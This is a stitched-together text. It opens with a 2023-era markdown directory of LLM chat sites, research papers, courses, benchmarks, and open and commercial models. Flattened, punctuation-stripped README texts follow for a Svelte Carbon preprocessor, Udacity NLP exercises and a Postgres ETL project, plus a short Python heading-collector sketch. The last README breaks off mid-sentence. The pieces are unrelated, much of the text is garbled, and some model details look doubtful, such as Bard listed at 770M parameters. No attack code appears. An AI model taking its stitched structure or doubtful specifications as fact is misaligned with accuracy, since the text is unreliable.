- [Anthropic Claude](https://claude.ai)
- [Inflection Pi](https://pi.ai)
- [Hugging Chat](https://huggingface.co/chat)
- [Microsoft Bing](https://www.bing.com/new)
- [You](https://you.com)
- [Perplexity](https://www.perplexity.ai)
- [Chatsonic](https://writesonic.com/chat)

## Research Papers

A selection of interesting/noteworthy research papers related to LLMs:

- 2023: [A Survey of Large Language Models](https://arxiv.org/abs/2303.18223)
- 2023: [A Comprehensive Overview of Large Language Models](https://arxiv.org/abs/2307.06435)
- 2023: [Open Problems and Fundamental Limitations of Reinforcement Learning from Human Feedback](https://arxiv.org/abs/2307.15217)
- 2023: [Aligning Large Language Models with Human: A Survey](https://arxiv.org/abs/2307.12966)
- 2023: [ToolLLM: Facilitating Large Language Models to Master 16000+ Real-world APIs](https://arxiv.org/abs/2307.16789v1)
- 2023: [Generative Agents: Interactive Simulacra of Human Behavior](https://arxiv.org/pdf/2304.03442.pdf)
- 2023: [QLoRA: Efficient Finetuning of Quantized LLMs](https://arxiv.org/abs/2305.14314)
- 2022: [Scaling Instruction-Finetuned Language Models](https://arxiv.org/abs/2210.11416)
- 2022: [Constitutional AI: Harmlessness from AI Feedback](https://arxiv.org/abs/2212.08073)
- 2022: [What Language Model Architecture and Pretraining Objective Work Best for Zero-Shot Generalization?](https://arxiv.org/abs/2204.05832)
- 2022: [Training Compute-Optimal Large Language Models](https://doi.org/10.48550/arXiv.2203.15556)
- 2022: [Training Language Models to Follow Instructions with Human Feedback](https://arxiv.org/abs/2203.02155)
- 2022: [Emergent Abilities of Large Language Models](https://arxiv.org/abs/2206.07682)
- 2022: [Chain-of-Thought Prompting Elicits Reasoning in Large Language Models](https://arxiv.org/abs/2201.11903)
- 2021: [LoRA: Low-Rank Adaptation of Large Language Models](https://arxiv.org/abs/2106.09685)
- 2021: [The Power of Scale for Parameter-Efficient Prompt Tuning](https://aclanthology.org/2021.emnlp-main.243)
- 2021: [On the Opportunities and Risks of Foundation Models](https://arxiv.org/abs/2108.07258)
- 2020: [Language Models are Few-Shot Learners](https://arxiv.org/abs/2005.14165)
- 2020: [Scaling Laws for Neural Language Models](https://arxiv.org/abs/2001.08361)
- 2018: [BERT: Pre-training of Deep Bidirectional Transformers for Language Understanding](https://arxiv.org/abs/1810.04805)
- 2017: [Attention Is All You Need](https://arxiv.org/abs/1706.03762)

## Education

Get skilled up with these free and paid-for courses:

- [Prompt Engineering Guide](https://github.com/dair-ai/Prompt-Engineering-Guide)
- [LLM Bootcamp](https://fullstackdeeplearning.com/llm-bootcamp)
- [Best Practices for Prompt Engineering with OpenAI API](https://help.openai.com/en/articles/6654000-best-practices-for-prompt-engineering-with-openai-api)
- [Lil'Log: Prompt Engineering](https://lilianweng.github.io/posts/2023-03-15-prompt-engineering)
- [Prompt Engineering Guide](https://learnprompting.org/docs/intro)
- [Cohere LLM University](https://docs.cohere.com/docs/llmu)
- [DeepLearning.AI: ChatGPT Prompt Engineering for Developers](https://www.deeplearning.ai/short-courses/chatgpt-prompt-engineering-for-developers)
- [DeepLearning.AI: Learn the fundamentals of generative AI for real-world applications](https://www.deeplearning.ai/courses/generative-ai-with-llms)
- [DeepLearning.AI: LangChain for LLM Application Development](https://www.deeplearning.ai/short-courses/langchain-for-llm-application-development)
- [Princeton COS 597G: Understanding Large Language Models](https://www.cs.princeton.edu/courses/archive/fall22/cos597G)
- [Stanford CS324: Large Language Models](https://stanford-cs324.github.io/winter2022)

## Benchmarks

These various benchmarks are commonly used to compare LLM performance:

- [ARC](https://arxiv.org/abs/2305.18354)
- [HellaSwag](https://arxiv.org/abs/1905.07830)
- [MMLU](https://arxiv.org/abs/2009.03300)
- [TruthfulQA](https://arxiv.org/abs/2109.07958)

## Leaderboards

These leaderboards show how LLMs compare relative to each other:

- [Hugging Face Open LLM Leaderboard](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
- [Chatbot Arena Leaderboard](https://huggingface.co/spaces/lmsys/chatbot-arena-leaderboard)
- [Alpaca Leaderboard](https://tatsu-lab.github.io/alpaca_eval)

## Open Source Models

Open source models are generally understood to be free to use, but some models have restrictive licensing that prohibits commercial use or restricts usage in some way. Be careful to check out the exact license for the model you want to use, making sure you understand exactly what is permissible.

### [Mistral](https://mistral.ai)
- Parameters: 7B
- Origin: [Mistral](https://mistral.ai)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: October 2023
- Commercial use possible: yes
- GitHub: https://huggingface.co/mistralai
- Comment: outperforms Llama2 13B

### [LongChat](https://lmsys.org/blog/2023-06-29-longchat)
- Parameters: 7B
- Origin: [UC Berkeley, CMU, Stanford, and UC San Diego](https://vicuna.lmsys.org)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: August 2023
- Commercial use possible: yes
- GitHub: https://github.com/DachengLi1/LongChat
- Comment: 32K context length

### [Qwen](https://huggingface.co/Qwen)
- Parameters: 7B
- Origin: Alibaba
- License: [Tongyi Qianwen](https://github.com/QwenLM/Qwen-7B/blob/main/LICENSE)
- Release date: August 2023
- Commercial use possible: yes
- GitHub: https://github.com/QwenLM/Qwen-7B

### [Vicuna 1.5](https://vicuna.lmsys.org)
- Parameters: 13B
- Origin: [UC Berkeley, CMU, Stanford, and UC San Diego](https://vicuna.lmsys.org)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: August 2023 (v1.5 uses Llama2 instead of the LLaMA of prior releases)
- Commercial use possible: no — trained on https://sharegpt.com conversations, which potentially breaches the OpenAI license
- GitHub: https://github.com/lm-sys/FastChat

### [Stable Beluga](https://stability.ai/blog/stable-beluga-large-instruction-fine-tuned-models)
- Parameters: 7B–40B
- Origin: Stability AI
- License: [CC BY-NC 4.0](https://creativecommons.org/licenses/by-nc/4.0)
- Release date: July 2023
- Commercial use possible: no
- GitHub: https://huggingface.co/stabilityai/StableBeluga2

### [Llama2](https://ai.meta.com/llama)
- Parameters: 7B–40B
- Origin: Meta
- License: [Llama 2 Community License Agreement](https://ai.meta.com/resources/models-and-libraries/llama-downloads)
- Release date: July 2023
- Paper: https://arxiv.org/abs/2307.09288
- Commercial use possible: yes
- GitHub: https://huggingface.co/meta-llama
- Training cost: "A cumulative of 3.3M GPU-hours of computation was performed on hardware of type A100-80GB (TDP of 400W or 350W). We estimate the total emissions for training to be 539 tCO2eq, of which 100% were directly offset by Meta's sustainability program."

### [Falcon](https://falconllm.tii.ae)
- Parameters: 7B, 40B
- Origin: UAE Technology Innovation Institute
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: May 2023
- Commercial use possible: yes
- GitHub: [falcon-7b](https://huggingface.co/tiiuae/falcon-7b), [falcon-7b-instruct](https://huggingface.co/tiiuae/falcon-7b-instruct), [falcon-40b](https://huggingface.co/tiiuae/falcon-40b), [falcon-40b-instruct](https://huggingface.co/tiiuae/falcon-40b-instruct)
- Training cost: Falcon-40B was trained on AWS SageMaker, on 384 A100 40GB GPUs in P4d instances.

### [MosaicML MPT-30B](https://www.mosaicml.com/blog/mpt-30b)
- Parameters: 30B
- Origin: open source from MosaicML
- License (MPT-30B base, instruct): [Attribution-ShareAlike 3.0 Unported](https://creativecommons.org/licenses/by-sa/3.0)
- License (MPT-30B chat): [Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)](https://creativecommons.org/licenses/by-nc-sa/4.0)
- Release date: June 2023
- Commercial use possible: yes (base, instruct); no (chat)
- GitHub: [base](https://huggingface.co/mosaicml/mpt-30b), [instruct](https://huggingface.co/mosaicml/mpt-30b-instruct), [chat](https://huggingface.co/mosaicml/mpt-30b-chat)
- Training cost: from scratch, 512xA100-40GB, 28.3 days, $871,000; finetune of the 30B base model, 16xA100-40GB, 21.8 hours, $871.

### [MosaicML MPT-7B](https://www.mosaicml.com/blog/mpt-7b)
- Parameters: 7B
- Origin: open source from MosaicML; claimed to be competitive with LLaMA-7B; base, storywriter, instruct, and chat fine-tunings available
- License (MPT-7B base): [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- License (MPT-7B-StoryWriter-65k+): [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- License (MPT-7B-Instruct): [CC BY-SA 3.0](https://creativecommons.org/licenses/by-sa/3.0)
- License (MPT-7B-Chat): [CC BY-NC-SA 4.0](https://creativecommons.org/licenses/by-nc-sa/4.0)
- Release date: May 2023
- Commercial use possible: yes
- GitHub: https://huggingface.co/mosaicml/mpt-7b
- Training cost: nearly all of the training budget was spent on the base MPT-7B model, which took 9.5 days to train on 440xA100-40GB GPUs and cost ~$200k.

### [Together RedPajama-INCITE](https://www.together.xyz/blog/redpajama-models-v1)
- Parameters: 3B, 7B
- Origin: official version of the open-source recreation of LLaMA; chat and instruction-tuned versions
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: May 2023
- Commercial use possible: yes
- GitHub: https://huggingface.co/togethercomputer/RedPajama-INCITE-Instruct-7B-v0.1
- Training cost: the training of the first collection of RedPajama-INCITE models was performed on 3,072 V100 GPUs provided as part of the INCITE compute grant on the Summit supercomputer at the Oak Ridge Leadership Computing Facility (OLCF).

### [OpenAlpaca](https://github.com/yxuansu/OpenAlpaca)
- Parameters: 7B
- Origin: an instruction-tuned version of OpenLLaMA
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: May 2023
- Commercial use possible: yes
- GitHub: https://github.com/yxuansu/OpenAlpaca

### [OpenLLaMA](https://github.com/openlm-research/open_llama)
- Parameters: 7B
- Origin: a claimed recreation of Meta's LLaMA without the licensing restrictions
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: May 2023
- Commercial use possible: yes
- GitHub: https://github.com/openlm-research/open_llama

### [Camel](https://huggingface.co/Writer/camel-5b-hf)
- Parameters: 5B (20B coming)
- Origin: [Writer](https://writer.com)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: April 2023
- Commercial use possible: yes
- GitHub: https://github.com/basetenlabs/camel-5b-truss

### [Palmyra](https://huggingface.co/Writer/palmyra-base)
- Parameters: 5B (20B coming)
- Origin: [Writer](https://writer.com)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: April 2023
- Commercial use possible: yes

### [StableLM](https://stability.ai/blog/stability-ai-launches-the-first-of-its-stablelm-suite-of-language-models)
- Parameters: 3B, 7B (15B, 65B coming)
- Origin: [Stability AI](https://stability.ai)
- License: [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0)
- Release date: April 2023
- Commercial use possible: yes
- GitHub: https://github.com/Stability-AI/StableLM

### [Databricks Dolly 2](https://www.databricks.com/blog/2023/04/12/dolly-first-open-commercially-viable-instruction-tuned-llm)
- Parameters: 12B
- Origin: [Databricks](https://www.databricks.com); an instruction-tuned version of EleutherAI Pythia
- License: [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0)
- Release date: April 2023
- Commercial use possible: yes
- GitHub: https://github.com/databrickslabs/dolly
- Training cost: Databricks cite "for thousands of dollars and in a few hours, Dolly 2.0 was built by fine-tuning a 12B parameter open-source model (EleutherAI's Pythia) on a human-generated dataset of 15k Q&A pairs". This, of course, is just the fine-tuning; the cost of training the underlying Pythia model also needs to be taken into account when estimating total training cost.

### [Vicuna](https://vicuna.lmsys.org)
- Parameters: 13B
- Origin: [UC Berkeley, CMU, Stanford, and UC San Diego](https://vicuna.lmsys.org)
- License: requires access to LLaMA; trained on https://sharegpt.com conversations, which potentially breaches the OpenAI license
- Release date: April 2023
- Commercial use possible: no
- GitHub: https://github.com/lm-sys/FastChat

### [Cerebras-GPT](https://www.cerebras.net/blog/cerebras-gpt-a-family-of-open-compute-efficient-large-language-models)
- Parameters: 111M, 256M, 590M, 1.3B, 2.7B, 6.7B, and 13B
- Origin: [Cerebras](https://www.cerebras.net)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: March 2023
- Paper: https://arxiv.org/abs/2304.03208
- Commercial use possible: yes

### [Stanford Alpaca](https://crfm.stanford.edu/2023/03/13/alpaca.html)
- Parameters: 7B
- Origin: [Stanford](https://crfm.stanford.edu/2023/03/13/alpaca.html); based on Meta's LLaMA
- License: requires access to LLaMA; trained on GPT conversations, against the OpenAI license
- Release date: March 2023
- Commercial use possible: no
- GitHub: https://github.com/tatsu-lab/stanford_alpaca
- Training cost: Replicate posted a [blog post](https://replicate.com/blog/replicate-alpaca) where they replicated the Alpaca fine-tuning process, using 4x A100-80GB GPUs for 1.5 hours. For total training cost, the cost of training the underlying LLaMA model also needs to be taken into account.

### [EleutherAI Pythia](https://github.com/EleutherAI/pythia)
- Parameters: 70M, 160M, 410M, 1B, 1.4B, 2.8B, 6.9B, 12B
- Origin: [EleutherAI](https://www.eleuther.ai)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: February 2023
- Paper: https://arxiv.org/pdf/2304.01373.pdf
- Commercial use possible: yes

### [LLaMA](https://ai.facebook.com/blog/large-language-model-llama-meta-ai)
- Parameters: 7B, 33B, 65B
- Origin: [Meta](https://ai.facebook.com/tools)
- License: model weights available for non-commercial use by application to Meta
- Release date: February 2023
- Paper: https://arxiv.org/abs/2302.13971
- Commercial use possible: no
- Training cost: Meta cite "when training a 65B parameter model, our code processes around 380 tokens/sec/GPU on 2048 A100 GPUs with 80GB of RAM. This means that training over our dataset containing 1.4T tokens takes approximately 21 days... Finally, we estimate that we used 2048 A100-80GB for a period of approximately 5 months to develop our models." However, that cost is for all the different model sizes combined; separately, in the LLaMA paper, Meta cite 1,022,362 GPU-hours on A100-80GB GPUs.

### [BLOOM](https://bigscience.huggingface.co/blog/bloom)
- Parameters: 176B
- Origin: [BigScience](https://bigscience.huggingface.co)
- License: [BigScience RAIL license](https://bigscience.huggingface.co/blog/the-bigscience-rail-license)
- Release date: July 2022
- Paper: https://arxiv.org/abs/2211.05100
- Commercial use possible: yes

### [Google PaLM](https://ai.googleblog.com/2022/04/pathways-language-model-palm-scaling-to.html)
- Parameters: 540B
- Origin: [Google](https://www.google.com)
- License: unknown; only an announcement of intent to open
- Release date: April 2022
- Paper: https://arxiv.org/abs/2204.02311
- Commercial use possible: awaiting more information

### [GPT-NeoX-20B](https://huggingface.co/EleutherAI/gpt-neox-20b)
- Parameters: 20B
- Origin: [EleutherAI](https://www.eleuther.ai)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: January 2022
- Paper: https://aclanthology.org/2022.bigscience-1.9
- Commercial use possible: yes
- GitHub: https://github.com/EleutherAI/gpt-neox

### [GPT-J](https://huggingface.co/EleutherAI/gpt-j-6b)
- Parameters: 6B
- Origin: [EleutherAI](https://www.eleuther.ai)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: June 2021
- Commercial use possible: yes

### [Google FLAN-T5](https://ai.googleblog.com/2020/02/exploring-transfer-learning-with-t5.html)
- Parameters: 80M, 250M, 780M, 3B, 11B
- Origin: [Google](https://www.google.com)
- License: [Apache 2.0](https://www.apache.org/licenses/LICENSE-2.0)
- Release date: October 2021
- Paper: https://arxiv.org/pdf/2210.11416.pdf
- Commercial use possible: yes
- GitHub: https://github.com/google-research/t5x

### [IBM Dromedary](https://github.com/IBM/Dromedary)
- Parameters: 7B, 13B, 33B, and 65B
- Origin: [IBM](https://research.ibm.com/artificial-intelligence); based on Meta's LLaMA
- License: GNU General Public License v3.0
- Paper: https://arxiv.org/abs/2305.03047
- Commercial use possible: no
- GitHub: https://github.com/IBM/Dromedary

## Commercial Models

These commercial models are generally available through some form of usage-based payment model: you use more, you pay more.

### [OpenAI](https://openai.com)

**GPT-4**
- Parameters: undeclared
- Availability: [wait list](https://openai.com/waitlist/gpt-4-api)
- Fine-tuning: no fine-tuning yet available or announced
- Paper: https://arxiv.org/abs/2303.08774
- Pricing: https://openai.com/pricing
- Endpoints: chat API endpoint, which also serves as a completions endpoint
- Privacy: [data from API calls is not collected or used to train models](https://openai.com/policies/api-data-usage-policies)

**GPT-3.5**
- Parameters: undeclared (GPT-3 had 175B)
- Availability: GA
- Fine-tuning: yes, available through APIs
- Paper: https://arxiv.org/pdf/2005.14165.pdf
- Pricing: https://openai.com/pricing
- Endpoints: a variety of endpoints available, including chat, embeddings, fine-tuning, moderation, completions
- Privacy: data from API calls is not collected or used to train models

**ChatGPT**
- Parameters: undeclared (uses the GPT-3.5 model)
- Availability: GA
- Fine-tuning: n/a (consumer web-based solution)
- Pricing: https://openai.com/pricing
- Endpoints: n/a (consumer web-based solution)
- Privacy: [data submitted on the web-based ChatGPT service is collected and used to train models](https://openai.com/policies/api-data-usage-policies)

### [AI21labs](https://www.ai21.com)

**Jurassic-2**
- Parameters: undeclared (Jurassic-1 had 178B)
- Availability: GA
- Fine-tuning: yes, available through APIs
- Pricing: https://www.ai21.com/studio/pricing
- Endpoints: a variety of endpoints available, including task-specific endpoints: paraphrase, grammatical errors, text improvements, summarisation, text segmentation, contextual answers

### [Anthropic](https://www.anthropic.com)

**Claude**
- Parameters: undeclared
- Availability: [waitlist](https://www.anthropic.com/product)
- Fine-tuning: not standard; large enterprises may contact via https://www.anthropic.com/earlyaccess to discuss
- Paper: https://arxiv.org/abs/2204.05862
- Pricing: https://cdn2.assets-servd.host/anthropic-website/production/images/apr-pricing-tokens.pdf
- Endpoints: completions endpoint
- Privacy: [data sent to/from is not used to train models unless feedback is given](https://vault.pactsafe.io/s/9f502c93-cb5c-4571-b205-1e479da61794/legal.html#terms)

### [Google](https://google.com)

**Google Bard**
- Parameters: 770M
- Availability: [waitlist](https://bard.google.com)
- Fine-tuning: no
- Endpoints: consumer UI only; API via PaLM

**Google PaLM API**
- Parameters: up to 540B
- Availability: [announced but not yet available](https://blog.google/technology/ai/ai-developers-google-cloud-workspace)
- Fine-tuning: unknown
- Paper: https://arxiv.org/abs/2204.02311
- Pricing, endpoints, privacy: unknown

### [Amazon](https://aws.amazon.com)

**Amazon Titan**
- Parameters: unknown
- Availability: [announced but not yet available](https://aws.amazon.com/bedrock/titan)
- Fine-tuning, pricing, endpoints, privacy: unknown

### [Cohere](https://cohere.ai)

**Cohere**
- Parameters: 52B
- Availability: GA
- Pricing: https://cohere.com/pricing
- Endpoints: a variety of endpoints, including embedding, text completion, classification, summarisation, tokenisation, language detection
- Privacy: [data submitted is used to train models](https://cohere.com/terms-of-use)

### [IBM](https://www.ibm.com/products/watsonx-ai)

**Granite**
- Parameters: 13B, 20B
- Availability: GA — granite-13b instruct/chat, granite-20b code (Ansible, COBOL); other variants on the roadmap
- Fine-tuning: currently prompt tuning via APIs
- Paper: https://www.ibm.com/downloads/cas/X9W4O6BM
- Pricing: https://www.ibm.com/products/watsonx-ai/pricing
- Endpoints: various endpoints: Q&A, generate, extract, summarise, classify
- Privacy: IBM curated 6.48 TB of data before pre-processing, 2.07 TB after pre-processing; 1T tokens were generated from a total of 14 datasets (detail in the [paper](https://www.ibm.com/downloads/cas/X9W4O6BM)). Prompt data is not saved by IBM for other training purposes; users have complete control, in their storage area, of any saved prompts, prompt sessions, or prompt-tuned models.
- Training cost: granite-13b was trained on 256 A100s for 1,056 GPU-hours.
- Legal: IBM indemnifies customer use of these models on the watsonx platform.
ai
carbon-preprocess-svelte
carbon preprocess svelte npm npm npm url github https img shields io github license ibm carbon preprocess svelte color 262626 style for the badge npm downloads to date https img shields io npm dt carbon preprocess svelte color 262626 style for the badge collection of svelte preprocessors https svelte dev docs svelte preprocess for the carbon design system installation yarn sh yarn add d carbon preprocess svelte npm sh npm i d carbon preprocess svelte pnpm sh pnpm i d carbon preprocess svelte usage this library contains the following preprocessors and plugins optimizeimports rewrites carbon svelte imports to their source path in the script block optimizecss rollup plugin that removes unused css using purgecss https github com fullhuman purgecss elements computes carbon tokens https www carbondesignsystem com guidelines themes overview tokens in the style block icons inlines carbon icons https www carbondesignsystem com guidelines icons library in the markup block pictograms inlines carbon pictograms https www carbondesignsystem com guidelines pictograms library in the markup block collectheadings extracts heading elements e g h1 h2 from the markup optimizeimports optimizeimports is a svelte script preprocessor that rewrites base imports from carbon components icons pictograms packages to their source svelte code paths this can greatly speed up compile times during development while preserving typeahead and autocompletion hinting offered by integrated development environments ide like vscode the preprocessor optimizes imports from the following packages carbon components svelte https github com carbon design system carbon components svelte carbon icons svelte https github com carbon design system carbon icons svelte carbon pictograms svelte https github com carbon design system carbon pictograms svelte example diff import button from carbon components svelte import add16 from carbon icons svelte import airplane from carbon pictograms svelte import button from carbon 
components svelte button svelte import add16 from carbon icons svelte lib add16 svelte import airplane from carbon pictograms svelte lib airplane svelte note a minimum version of carbon preprocess svelte 0 9 0 is required for carbon component svelte 0 63 0 a minimum version of carbon preprocess svelte 0 8 0 is required for carbon icons svelte 11 usage js svelte config js import optimizeimports from carbon preprocess svelte export default preprocess optimizeimports optimizecss optimizecss is a rollup plugin that removes unused carbon css it extracts selectors based on a svelte component s markup and style content and uses purgecss https github com fullhuman purgecss to prune any unused styles usage optimizecss should be added to the list of vite plugins take care to only run the plugin when building for production js svelte config js import adapter from sveltejs adapter static import optimizecss from carbon preprocess svelte export default kit adapter adapter vite plugins process env node env production optimizecss api ts interface optimizecssoptions safelist standard array regexp string deep regexp greedy regexp elements elements is a svelte style preprocessor that rewrites carbon design system tokens https www carbondesignsystem com guidelines themes overview tokens to their computed values the purpose is to use design system token names e g interactive 01 instead of hardcoded values e g 0f62fe before svelte style h1 h2 font weight semibold background ui 01 div font expressive heading 01 transition background easing standard productive media between 321px and md div color blue 60 style after svelte style h1 h2 font weight 600 background f4f4f4 div font size 0 875rem font weight 600 line height 1 25 letter spacing 0 16px transition background cubic bezier 0 2 0 0 38 0 9 media between 321px and md div color 0f62fe style usage js svelte config js import elements from carbon preprocess svelte export default preprocess elements api ts interface elementsoptions specify 
the carbon theme setting to all will also enable cssvars default white theme white g10 g90 g100 all set to true for tokens to be re written as css variables automatically set to true if theme is all example spacing 05 var cds spacing 05 ui 01 var cds ui 01 default false cssvars boolean icons icons is a svelte markup preprocessor that inlines carbon svg icons https www carbondesignsystem com guidelines icons library the only required attribute is name which represents the module name of the icon refer to carbon icons svelte icon index md https github com carbon design system carbon icons svelte blob master icon index md for a list of supported icons example diff icon name add16 svg xmlns http www w3 org 2000 svg viewbox 0 0 32 32 fill currentcolor focusable false preserveaspectratio xmidymid meet width 16 height 16 path d m17 15l17 8 15 8 15 15 8 15 8 17 15 17 15 24 17 24 17 17 24 17 24 15z path svg usage js svelte config js import icons from carbon preprocess svelte export default preprocess icons pictograms pictograms is a svelte markup preprocessor that inlines carbon svg pictograms https www carbondesignsystem com guidelines pictograms library the only required attribute is name which represents the module name of the pictogram refer to carbon pictograms svelte pictogram index md https github com carbon design system carbon pictograms svelte blob master pictogram index md for a list of supported pictograms example diff pictogram name airplane svg xmlns http www w3 org 2000 svg viewbox 0 0 32 32 fill currentcolor focusable false preserveaspectratio xmidymid meet width 64 height 64 path d m22 31 36c 0 038 0 0 076 0 007 0 114 0 019l16 29 38l 5 886 1 962c 0 11 0 035 0 231 0 018 0 324 0 05 c9 696 31 225 9 64 31 115 9 64 31v 2c0 0 104 0 044 0 202 0 123 0 271l3 877 3 393v5 169c0 1 419 0 594 4 529 2 36 4 529 s2 36 3 11 2 36 4 529v5 166l2 279 1 759v10h0 721v2 65l2 279 1 759v12h0 721v2 965l4 859 3 75c0 089 0 068 0 141 0 174 0 141 0 285 v4 5c0 0 128 0 068 0 246 0 179 0 
311c 0 112 0 066 0 247 0 065 0 359 0 003l 10 458 5 916l 0 004 7 439l3 877 3 393 c0 078 0 068 0 123 0 167 0 123 0 271v2c0 0 115 0 056 0 225 0 149 0 292c22 148 31 337 22 074 31 36 22 31 36z m16 28 64 c0 039 0 0 077 0 007 0 114 0 019l5 526 1 843v 1 338l 3 877 3 393c 0 078 0 068 0 123 0 167 0 123 0 271l0 005 8 22 c0 0 128 0 068 0 246 0 179 0 311c0 112 0 064 0 247 0 065 0 359 0 002l10 457 5 916v 3 706l 10 859 8 38 c 0 089 0 068 0 141 0 174 0 141 0 285v5 169c0 1 33 0 562 3 81 1 64 3 81c 1 077 0 1 64 2 48 1 64 3 81v25 5 c0 0 104 0 044 0 202 0 123 0 271l 3 877 3 393v1 338l5 526 1 843c15 923 28 646 15 961 28 64 16 28 64z m3 23 86 c 0 062 0 0 125 0 017 0 18 0 049c 0 111 0 064 0 18 0 183 0 18 0 312v19c0 0 112 0 052 0 218 0 141 0 286l4 859 3 721v12h0 72 v2 441l2 28 1 746v10h0 72v2 873c0 0 112 0 052 0 218 0 141 0 286l3 36 19 178v3 699l8 46 4 884l0 36 0 623l 9 5 195 c3 125 23 844 3 062 23 86 3 23 86z path svg usage js svelte config js import pictograms from carbon preprocess svelte export default preprocess pictograms collectheadings collectheadings extracts heading elements from markup with an optional callback to modify the source content this can be used to create a table of contents example markup svelte main toc h1 id h1 heading 1 h1 h2 id h2 strong heading strong 2 h2 h3 heading 3 h3 main extracted headings js const headings id h1 text heading 1 level 1 id h2 0 text heading 2 level 2 id h2 1 text heading 2 level 2 id undefined text heading 3 level 3 usage in the following example we create a table of contents from the h2 elements in a svelte file in the aftercollect callback we replace toc with the table of contents js svelte config js import collectheadings from carbon preprocess svelte export default preprocess collectheadings aftercollect headings content const toc headings filter heading heading level 2 map item li a href item id item text a li join return content replace toc ul toc ul api js interface collectheadingsoptions specify the filename pattern to process 
defaults to files ending with svelte default svelte test regexp optional callback to transform the content after extracting all headings aftercollect headings array id string text string level 1 2 3 4 5 6 content string string include include prepends or appends arbitrary content to the script and markup blocks example diff script import codesnippet from carbon components svelte import onmount from svelte script toc h1 title h1 p summary p usage in the above example we prepend script content that imports the codesnippet component from carbon components svelte in the markup we prepend toc and append p summary p js svelte config js import include from carbon preprocess svelte export default preprocess include script content import codesnippet from carbon components svelte markup content toc content p summary p behavior append api by default the include preprocessor will prepend content to the content block set behavior to append to append the content js interface preprocessincludeoptions specify the filename pattern to process defaults to files ending with svelte default svelte test regexp script array specify the content to prepend or append example import codesnippet from carbon components svelte content string specify the filename pattern to process defaults to files ending with svelte default svelte test regexp specify whether the content should be prepended or appended default prepend behavior prepend append markup array specify the content to prepend or append example ul table of contents ul content string specify the filename pattern to process defaults to files ending with svelte default svelte test regexp specify whether the content should be prepended or appended default prepend behavior prepend append presets js svelte config js import presetcarbon from carbon preprocess svelte export default preprocess presetcarbon if using other preprocessors preprocess presetcarbon sample sveltekit set up js svelte config js import adapter from sveltejs adapter static
import optimizeimports optimizecss from carbon preprocess svelte type import sveltejs kit config export default preprocess optimizeimports kit adapter adapter vite plugins process env node env production optimizecss contributing refer to the contributing guidelines contributing md license apache 2 0 license npm https img shields io npm v carbon preprocess svelte svg color 262626 style for the badge npm url https npmjs com package carbon preprocess svelte
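The collectheadings idea above — scan markup for heading elements, then build a table of contents from them — is language-agnostic. A minimal Python sketch of the same two steps (regex-based and simplified; the real preprocessor parses Svelte markup, and these helper names are made up for illustration):

```python
import re

def collect_headings(markup):
    """Collect {id, text, level} dicts from <h1>-<h6> tags in a markup string.

    Simplified regex-based sketch of a heading collector; the real
    carbon-preprocess-svelte collectheadings works on Svelte components.
    """
    headings = []
    pattern = re.compile(r"<h([1-6])([^>]*)>(.*?)</h\1>", re.IGNORECASE | re.DOTALL)
    for match in pattern.finditer(markup):
        level = int(match.group(1))
        attrs, inner = match.group(2), match.group(3)
        id_match = re.search(r'id="([^"]*)"', attrs)
        text = re.sub(r"<[^>]+>", "", inner).strip()  # drop nested tags like <strong>
        headings.append({
            "id": id_match.group(1) if id_match else None,
            "text": text,
            "level": level,
        })
    return headings

def render_toc(headings):
    """Build a <ul> table of contents from the level-2 headings, as in the README example."""
    items = "".join(
        f'<li><a href="#{h["id"]}">{h["text"]}</a></li>'
        for h in headings if h["level"] == 2
    )
    return f"<ul>{items}</ul>"
```

This mirrors the aftercollect callback in the README: filter the extracted headings by level, map them to list items, and splice the result back into the page.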
svelte svelte-preprocessor preprocess carbon carbon-design-system carbon-preprocess
os
AIND-NLP
aind natural language processing coding exercises for the natural language processing concentration part of udacity s artificial intelligence nanodegree program setup you need python 3 6 and the packages mentioned in requirements txt you can install them using bash pip install r requirements txt data data files for exercises are included under data but some of the nlp libraries require additional data for performing tasks like pos tagging lemmatization etc specifically nltk will throw an error if the required data is not installed you can use the following python statement to open the nltk downloader and select the desired package s to install python nltk download you can also download all available nltk data packages which includes a number of sample corpora as well but that may take a while 10 gb run to run any script file use bash python script py to open a notebook use bash jupyter notebook notebook ipynb a rel license href http creativecommons org licenses by nc nd 4 0 img alt creative commons license style border width 0 src https i creativecommons org l by nc nd 4 0 88x31 png a br this work is licensed under a a rel license href http creativecommons org licenses by nc nd 4 0 creative commons attribution noncommercial noderivatives 4 0 international license a please refer to udacity terms of service https www udacity com legal for further information
natural-language-processing nlp artificial-intelligence machine-learning udacity nanodegree
ai
postgresql_etl
p align center img src images postgres png style height 25 width 25 max width 30px p project overview this project is an exercise for data modeling with postgres and building an etl pipeline using python fact and dimension tables for a star schema are defined and an etl pipeline is written to transfer data from files in two local directories into tables in postgres using python and sql the dataset is a simulated dataset of a spotify like startup it includes songplay logs song details and artist details the data is modeled using a star schema with 1 fact table songplays and 4 dimension tables users songs artists and time libraries used the following libraries are used in this project postgresql psycopg2 pydata pandas utilities glob os how to run run create tables py to initialize or drop previous database and create empty tables run etl py to run the etl pipeline that extracts data from files into the database use test ipynb to query database files description create tables py drops existing database and tables and creates new database and tables etl ipynb a walkthrough template with detailed instructions for creating the etl py file etl py an etl pipeline that extracts data from files into the database and creates 5 tables songplays users songs artists and time sql queries py containing sql commands to drop and create tables insert records and query database test ipynb a 